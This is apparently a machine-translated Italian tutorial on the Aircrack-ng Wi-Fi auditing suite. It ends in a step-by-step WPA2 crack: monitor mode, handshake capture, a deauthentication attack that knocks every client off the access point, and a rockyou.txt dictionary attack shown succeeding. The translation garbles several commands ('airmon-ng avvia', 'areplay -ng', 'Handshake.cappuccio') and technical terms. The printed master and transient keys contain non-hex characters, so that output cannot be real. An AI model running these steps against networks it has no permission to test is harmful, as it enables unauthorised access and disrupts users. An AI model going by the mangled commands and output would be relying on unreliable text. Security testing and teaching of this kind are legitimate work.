Aircrack-ng è un set completo di software progettato per testare la sicurezza della rete wifi. Non è solo un singolo strumento ma una raccolta di strumenti, ognuno dei quali esegue uno scopo particolare. Diverse aree di sicurezza WiFi possono essere elaborate, come il monitoraggio del punto di accesso, il test, l'attacco della rete, il crack della rete WiFi e il test. L'obiettivo chiave di Aircrack è intercettare i pacchetti e decifrare gli hash per rompere le password. Supporta quasi tutte le nuove interfacce wireless. Aircrack-ng è una versione migliorata di una suite di strumenti obsoleta Aircrack, NG si riferisce al Nuova generazione. Alcuni degli strumenti fantastici che lavorano insieme per svolgere un compito più grande.
Airmon-Ng:
Airmon-NG è incluso nel kit Aircrack-NG che posiziona la scheda di interfaccia di rete in modalità Monitor. Le schede di rete di solito accettano pacchetti mirati solo per loro come definiti dall'indirizzo MAC della NIC, ma con Airmon-Ng, tutti i pacchetti wireless, che siano presi di mira o no, saranno accettati anche. Dovresti essere in grado di catturare questi pacchetti senza collegare o autentico con il punto di accesso. Viene utilizzato per verificare lo stato di un punto di accesso inserendo l'interfaccia di rete in modalità Monitor. Innanzitutto bisogna configurare le schede wireless per attivare la modalità monitora. Dopo aver terminato i processi, la modalità Monitor può essere abilitata sull'interfaccia wireless eseguendo il comando di seguito:
ubuntu@ubuntu: ~ $ sudo airmon-ng avvia wlan0 #
È inoltre possibile disabilitare la modalità Monitor arrestando Airmon-Ng in qualsiasi momento utilizzando il comando seguente:
ubuntu@ubuntu: ~ $ sudo airmon-ng stop wlan0 #
Airodump-Ng:
Airodump-ng viene utilizzato per elencare tutte le reti che ci circondano e per visualizzare preziose informazioni su di loro. La funzionalità di base di Airodump-ng è annusare i pacchetti, quindi è essenzialmente programmata per afferrare tutti i pacchetti intorno a noi mentre vengono messi in modalità monitor. Lo eseguiremo contro tutte le connessioni che ci circondano e raccoglieremo dati come il numero di client collegati alla rete, i loro indirizzi MAC corrispondenti, lo stile di crittografia e i nomi dei canali e quindi iniziare a prendere di mira la nostra rete di destinazione.
Digitando il comando Airodump-NG e dandogli il nome dell'interfaccia di rete come parametro, possiamo attivare questo strumento. Elencherà tutti i punti di accesso, la quantità di pacchetti di dati, i metodi di crittografia e autenticazione utilizzati e il nome della rete (ESSID). Da un punto di vista dell'hacking, gli indirizzi MAC sono i campi più importanti.
ubuntu@ubuntu: ~ $ sudo Airodump-ng wlx0mon
Aircrack-ng:
AirCrack viene utilizzato per la cracking della password. Dopo aver catturato tutti i pacchetti usando AirOdump, possiamo rompere la chiave di Aircrack. Rompe questi tasti usando due metodi PTW e FMS. L'approccio PTW viene effettuato in due fasi. Inizialmente, vengono utilizzati solo i pacchetti ARP e solo allora, se la chiave non viene rotta dopo la ricerca, utilizza tutti gli altri pacchetti catturati. Un punto in più dell'approccio PTW è che non tutti i pacchetti vengono utilizzati per il cracking. Nel secondo approccio, io.e., FMS, utilizziamo sia i modelli statistici che gli algos di forza bruta per rompere la chiave. È possibile utilizzare anche un metodo del dizionario.
Aireplay-ng:
Airplay-NG introduce i pacchetti in una rete wireless per creare o accelerare il traffico. I pacchetti di due diverse fonti possono essere catturati da Aireplay-ng. Il primo è la rete live e il secondo sono i pacchetti del file PCAP già esistente. AirPlay-NG è utile durante un attacco di deautenticazione che si rivolge a un punto di accesso wireless e un utente. Inoltre, puoi eseguire alcuni attacchi come l'attacco di latte di caffè con Airplay-NG, uno strumento che ti consente di ottenere una chiave dal sistema del cliente. Puoi raggiungere questo obiettivo catturando un pacchetto ARP e quindi manipolandolo e inviandolo al sistema. Il client creerà quindi un pacchetto che può essere catturato da Airodump e Aircrack rompe la chiave da quel pacchetto modificato. Alcune altre opzioni di attacco di airplay-ng includono chopchop, frammenti areplay, ecc.
Airbase-ng:
Airbase-ng viene utilizzato per trasformare il computer di un intruso in un punto di connessione compromesso per gli altri da collegare a. Usando Airbase-Ng, puoi affermare di essere un punto di accesso legale e condurre attacchi man-in-the-middle ai computer collegati alla rete. Questi tipi di attacchi sono chiamati attacchi gemelli malvagi. È impossibile per gli utenti di base discernere tra un punto di accesso legale e un punto di accesso falso. Quindi, la malvagia minaccia gemella è tra le minacce wireless più minacciose che affrontiamo oggi.
AirOlib-Ng:
AirOlib accelera il processo di hacking memorizzando e gestendo gli elenchi di password e il punto di accesso. Il sistema di gestione del database utilizzato da questo programma è SQLite3, che è principalmente disponibile su tutte le piattaforme. La cracking della password include il calcolo della chiave master a coppie attraverso la quale viene estratta la chiave transitoria privata (PTK). Usando il PTK, è possibile determinare il codice di identificazione del messaggio del frame (MIC) per un determinato pacchetto e trovare teoricamente il microfono simile al pacchetto, quindi se il PTK era giusto, anche il PMK era giusto.
Per visualizzare gli elenchi di password e le reti di accesso archiviate nel database, digitare il comando seguente:
ubuntu@ubuntu: ~ $ sudo Airolib -ng TestDatabase -Stats
Qui TestDatabase è il DB a cui si desidera accedere o creare e -Stats è l'operazione che si desidera eseguire su di esso. È possibile eseguire più operazioni sui campi del database, come dare la massima priorità ad alcuni SSID o qualcosa del genere. Per utilizzare Airolib-NG con Aircrack-NG, immettere il seguente comando:
ubuntu@ubuntu: ~ $ sudo aircrack -ng -r testdatabase wpa2.Eapol.cappuccio
Qui stiamo usando il PMK già calcolato memorizzato nel testdatabase Per accelerare il processo di cracking della password.
Cracking WPA/WPA2 usando AirCrack-Ng:
Diamo un'occhiata a un piccolo esempio di ciò che Aircrack-ng può fare con l'aiuto di alcuni dei suoi fantastici strumenti. Rompretteremo una chiave pre-condizionata della rete WPA/WPA2 utilizzando un metodo del dizionario.
La prima cosa che dobbiamo fare è elencare le interfacce di rete che supportano la modalità Monitor. Questo può essere fatto usando il seguente comando:
ubuntu@ubuntu: ~ $ sudo airmon-ng
PHY Interface Driver Chipset
Phy0 wlx0 rtl8xxxu realtek semiconductor corp.
Possiamo vedere un'interfaccia; Ora, dobbiamo mettere l'interfaccia di rete che abbiamo trovato (WLX0) in modalità Monitor utilizzando il seguente comando:
ubuntu@ubuntu: ~ $ sudo airmon-ng avvia wlx0
Ha abilitato la modalità monitor sull'interfaccia chiamata wlx0mon.
Ora dovremmo iniziare ad ascoltare le trasmissioni dai router vicini attraverso la nostra interfaccia di rete che abbiamo messo in modalità monitoraggio.
ubuntu@ubuntu: ~ $ sudo Airodump-ng wlx0mon
CH 5] [Eluted: 30 s] [2020-12-02 00:17
BSSID PWR BEACONS #Data, #/S CH MB ENC CIPHER AUTH ESSID
E4: 6f: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK crackit
C4: E9: 84: 76: 10: be -63 77 0 0 6 54e. WPA2 CCMP PSK HACKME
C8: 3A: 35: A0: 4e: 01 -63 84 0 0 8 54E WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP -Link_3802
Stazione di tasso PWR della stazione PWR BSSID sonda
E4: 6f: 13: 04: CE: 31 5c: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1E- 6E 0 3
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6f: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13
La nostra rete target è Crackit In questo caso, che è attualmente in esecuzione sul canale 1.
Qui per rompere la password della rete di destinazione, dobbiamo acquisire una stretta di mano a 4 vie, che si verifica quando un dispositivo cerca di connettersi a una rete. Possiamo catturarlo usando il seguente comando:
ubuntu@ubuntu: ~ $ sudo airodump -ng -c 1 --bsid e4: 6f: 13: 04: CE: 31 -w /home wlx0
-C : Canale
-bssid: BSSID della rete target
-w : Il nome della directory in cui verrà inserito il file PCAP
Ora dobbiamo aspettare che un dispositivo si connetta alla rete, ma c'è un modo migliore per catturare una stretta di mano. Possiamo disabilitare i dispositivi all'AP usando un attacco di deautenticazione usando il seguente comando:
ubuntu@ubuntu: ~ $ sudo areplay -ng -0 -a e4: 6f: 13: 04: CE: 31
UN: BSSID della rete target
-0: Attacco di deautenticazione
Abbiamo disconnesso tutti i dispositivi e ora dobbiamo attendere che un dispositivo si connetta alla rete.
Ch 1] [Eluted: 30 S] [2020-12-02 00:02] [WPA Handshake: E4: 6f: 13: 04: CE:
BSSID PWR RXQ BEACONS #Data, #/S CH MB ENC CIPHER AUTH E
E4: 6f: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
Stazione di tasso PWR della stazione PWR BSSID sonda
E4: 6f: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6f: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6f: 13: 04: CE: 31 88: 28: B3: 30: 27: 7e -31 0e- 1 0 32
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 crackit
E4: 6f: 13: 04: CE: 31 D4: 6a: 6a: 99: ED: E3 -35 0e- 0e 0 86
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1E 0 1
Abbiamo avuto un successo e guardando l'angolo in alto a destra proprio accanto al tempo, possiamo vedere una stretta di mano è stata catturata. Ora guarda nella cartella specificata ( /casa nel nostro caso) per un ".PCAP" file.
Per rompere la chiave WPA, possiamo usare il seguente comando:
ubuntu@ubuntu: ~ $ sudo aircrack -ng -a2 -w rockyou.txt -b e4: 6f: 13: 04: CE: 31 Handshake.cappuccio
B: BSSID della rete target
-A2: Modalità WPA2
Rockyou.txt: il file del dizionario utilizzato
Stretta di mano.CAP: il file che contiene una stretta di mano catturata
Aircrack-ng 1.2 beta3
[00:01:49] 10566 Testi di chiavi (1017.96 k/s)
Chiave trovato! [ Mi hai ]
Chiave principale: 8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0c 06 08 ed bc 6b H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Chiave transitoria: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8d 2d A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
Mac: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5d 71
La chiave per la nostra rete target è stata rotta con successo.
Conclusione:
Le reti wireless sono ovunque, utilizzate da ogni azienda, dai lavoratori che utilizzano smartphone ai dispositivi di controllo industriali. Secondo la ricerca, quasi il 50 percento del traffico Internet sarà su WiFi nel 2021. Le reti wireless hanno molti vantaggi, comunicazioni esterne porte, un rapido accesso a Internet in luoghi in cui è quasi impossibile gettare i fili, può espandere la rete senza installare cavi per qualsiasi altro utente e può facilmente connettere i tuoi dispositivi mobili ai tuoi uffici lì.
Nonostante questi vantaggi, c'è un grosso punto interrogativo sulla tua privacy e sicurezza. Come queste reti; All'interno della gamma di trasmissione di router è aperto a tutti, possono essere facilmente attaccati e i tuoi dati possono essere facilmente compromessi. Ad esempio, se sei connesso ad un WiFi pubblico, chiunque sia connesso a quella rete può facilmente controllare il traffico della rete utilizzando un po 'di intelligenza e con l'aiuto di strumenti fantastici disponibili e persino scaricarlo.